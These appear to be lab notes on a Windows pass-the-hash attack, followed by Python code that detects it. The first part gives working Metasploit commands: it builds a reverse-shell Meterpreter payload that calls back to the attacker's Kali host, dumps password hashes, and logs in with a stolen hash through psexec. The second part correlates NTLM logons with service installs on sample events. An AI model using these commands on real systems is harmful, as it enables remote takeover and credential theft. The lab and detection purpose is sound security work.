kali : 192.168.3.136
windows server 2012 : 192.168.3.129
1. Generate an EXE remote-control payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.3.136 LPORT=12345 -f exe > /root/test.exe
2. Get the reverse connection back to Kali
Start msf
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.3.136
set lport 12345
run
3. Capture the Windows passwords
run post/windows/gather/hashdump
run post/windows/gather/smart_hashdump
4. Log in using the hash
use exploit/windows/smb/psexec
Set the IP, account, and hash
set rhosts 192.168.3.129
set SMBuser <username>
set SMBPass hash
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.3.136
set lport 1111
The reverse connection succeeds
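
On the Windows server, the hash login in step 4 shows up as an NTLM network logon (Security event 4624, logon type 3) followed shortly by a service installation (System event 7045). The Python below is an added example, not part of the original notes, that correlates the two; the event dictionaries are constructed samples with simplified field names, and the host name, user names, service names and 60-second window are assumptions.

```python
from datetime import datetime, timedelta

# Constructed sample events (not real logs). Field names are simplified
# assumptions; the two lab addresses come from the notes above.
EVENTS = [
    {"time": "2024-01-01T10:00:00", "host": "WIN2012", "id": 4624, "logon_type": 3,
     "auth_package": "NTLM", "user": "Administrator", "src_ip": "192.168.3.136"},
    {"time": "2024-01-01T10:00:04", "host": "WIN2012", "id": 7045,
     "service_name": "qZxPlmWk", "image_path": "%SYSTEMROOT%\\hTgbRwqa.exe"},
    {"time": "2024-01-01T11:30:00", "host": "WIN2012", "id": 4624, "logon_type": 3,
     "auth_package": "Kerberos", "user": "backup", "src_ip": "192.168.3.10"},
    {"time": "2024-01-01T11:30:05", "host": "WIN2012", "id": 7045,
     "service_name": "BackupAgent", "image_path": "C:\\Program Files\\Backup\\agent.exe"},
    {"time": "2024-01-01T12:00:00", "host": "WIN2012", "id": 4624, "logon_type": 3,
     "auth_package": "NTLM", "user": "alice", "src_ip": "192.168.3.50"},
]

def is_ntlm_network_logon(ev):
    """True for a successful network logon authenticated with NTLM."""
    return (ev["id"] == 4624 and ev.get("logon_type") == 3
            and ev.get("auth_package") == "NTLM"
            and ev.get("user", "").upper() != "ANONYMOUS LOGON")

def find_remote_service_installs(events, window_seconds=60):
    """Pair each 7045 service install with any NTLM network logon seen on
    the same host in the preceding window_seconds."""
    window = timedelta(seconds=window_seconds)
    logons, alerts = [], []
    for ev in sorted(events, key=lambda e: datetime.fromisoformat(e["time"])):
        ts = datetime.fromisoformat(ev["time"])
        if is_ntlm_network_logon(ev):
            logons.append((ts, ev))
        elif ev["id"] == 7045:
            for logon_ts, logon in logons:
                if logon["host"] == ev["host"] and ts - logon_ts <= window:
                    alerts.append({"host": ev["host"], "user": logon["user"],
                                   "src_ip": logon["src_ip"],
                                   "service_name": ev["service_name"],
                                   "image_path": ev["image_path"],
                                   "delay_s": (ts - logon_ts).total_seconds()})
    return alerts

if __name__ == "__main__":
    for alert in find_remote_service_installs(EVENTS):
        print(alert)
```

The Kerberos logon and the NTLM logon with no following service install are deliberately left unflagged, since NTLM network logons on their own are common in most environments.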